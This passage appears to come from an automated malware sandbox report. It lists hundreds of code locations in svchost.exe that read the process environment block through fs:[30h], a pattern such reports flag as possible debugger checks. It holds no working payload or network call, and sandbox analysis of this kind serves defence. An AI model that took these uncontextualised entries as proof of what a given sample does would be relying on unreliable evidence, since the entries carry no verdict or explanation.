          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov ecx, dword ptr fs:[00000030h]1_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA352 mov eax, dword ptr fs:[00000030h]1_2_032FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D8350 mov ecx, dword ptr fs:[00000030h]1_2_032D8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330634F mov eax, dword ptr fs:[00000030h]1_2_0330634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]1_2_0325438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]1_2_0325438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032663FF mov eax, dword ptr fs:[00000030h]1_2_032663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC3CD mov eax, dword ptr fs:[00000030h]1_2_032EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B63C0 mov eax, dword ptr fs:[00000030h]1_2_032B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov ecx, dword ptr fs:[00000030h]1_2_032DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]1_2_032D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]1_2_032D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322823B mov eax, dword ptr fs:[00000030h]1_2_0322823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322826B mov eax, dword ptr fs:[00000030h]1_2_0322826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B8243 mov eax, dword ptr fs:[00000030h]1_2_032B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B8243 mov ecx, dword ptr fs:[00000030h]1_2_032B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330625D mov eax, dword ptr fs:[00000030h]1_2_0330625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A250 mov eax, dword ptr fs:[00000030h]1_2_0322A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236259 mov eax, dword ptr fs:[00000030h]1_2_03236259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]1_2_032EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]1_2_032EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]1_2_032402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]1_2_032402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov ecx, dword ptr fs:[00000030h]1_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]1_2_0326E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]1_2_0326E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033062D6 mov eax, dword ptr fs:[00000030h]1_2_033062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260124 mov eax, dword ptr fs:[00000030h]1_2_03260124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov ecx, dword ptr fs:[00000030h]1_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F0115 mov eax, dword ptr fs:[00000030h]1_2_032F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304164 mov eax, dword ptr fs:[00000030h]1_2_03304164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304164 mov eax, dword ptr fs:[00000030h]1_2_03304164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov ecx, dword ptr fs:[00000030h]1_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C156 mov eax, dword ptr fs:[00000030h]1_2_0322C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C8158 mov eax, dword ptr fs:[00000030h]1_2_032C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]1_2_03236154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]1_2_03236154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03270185 mov eax, dword ptr fs:[00000030h]1_2_03270185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]1_2_032EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]1_2_032EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]1_2_032D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]1_2_032D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033061E5 mov eax, dword ptr fs:[00000030h]1_2_033061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032601F8 mov eax, dword ptr fs:[00000030h]1_2_032601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]1_2_032F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]1_2_032F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A020 mov eax, dword ptr fs:[00000030h]1_2_0322A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C020 mov eax, dword ptr fs:[00000030h]1_2_0322C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6030 mov eax, dword ptr fs:[00000030h]1_2_032C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4000 mov ecx, dword ptr fs:[00000030h]1_2_032B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325C073 mov eax, dword ptr fs:[00000030h]1_2_0325C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232050 mov eax, dword ptr fs:[00000030h]1_2_03232050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6050 mov eax, dword ptr fs:[00000030h]1_2_032B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032280A0 mov eax, dword ptr fs:[00000030h]1_2_032280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C80A8 mov eax, dword ptr fs:[00000030h]1_2_032C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F60B8 mov eax, dword ptr fs:[00000030h]1_2_032F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F60B8 mov ecx, dword ptr fs:[00000030h]1_2_032F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323208A mov eax, dword ptr fs:[00000030h]1_2_0323208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0322A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032380E9 mov eax, dword ptr fs:[00000030h]1_2_032380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B60E0 mov eax, dword ptr fs:[00000030h]1_2_032B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C0F0 mov eax, dword ptr fs:[00000030h]1_2_0322C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032720F0 mov ecx, dword ptr fs:[00000030h]1_2_032720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B20DE mov eax, dword ptr fs:[00000030h]1_2_032B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]1_2_0326C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]1_2_0326C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]1_2_0326273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov ecx, dword ptr fs:[00000030h]1_2_0326273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]1_2_0326273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AC730 mov eax, dword ptr fs:[00000030h]1_2_032AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C700 mov eax, dword ptr fs:[00000030h]1_2_0326C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230710 mov eax, dword ptr fs:[00000030h]1_2_03230710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260710 mov eax, dword ptr fs:[00000030h]1_2_03260710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238770 mov eax, dword ptr fs:[00000030h]1_2_03238770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov esi, dword ptr fs:[00000030h]1_2_0326674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]1_2_0326674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]1_2_0326674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230750 mov eax, dword ptr fs:[00000030h]1_2_03230750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE75D mov eax, dword ptr fs:[00000030h]1_2_032BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]1_2_03272750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]1_2_03272750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4755 mov eax, dword ptr fs:[00000030h]1_2_032B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032307AF mov eax, dword ptr fs:[00000030h]1_2_032307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E47A0 mov eax, dword ptr fs:[00000030h]1_2_032E47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D678E mov eax, dword ptr fs:[00000030h]1_2_032D678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE7E1 mov eax, dword ptr fs:[00000030h]1_2_032BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]1_2_032347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]1_2_032347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323C7C0 mov eax, dword ptr fs:[00000030h]1_2_0323C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B07C3 mov eax, dword ptr fs:[00000030h]1_2_032B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E627 mov eax, dword ptr fs:[00000030h]1_2_0324E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03266620 mov eax, dword ptr fs:[00000030h]1_2_03266620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268620 mov eax, dword ptr fs:[00000030h]1_2_03268620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323262C mov eax, dword ptr fs:[00000030h]1_2_0323262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE609 mov eax, dword ptr fs:[00000030h]1_2_032AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272619 mov eax, dword ptr fs:[00000030h]1_2_03272619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]1_2_032F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]1_2_032F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h]1_2_0326A660
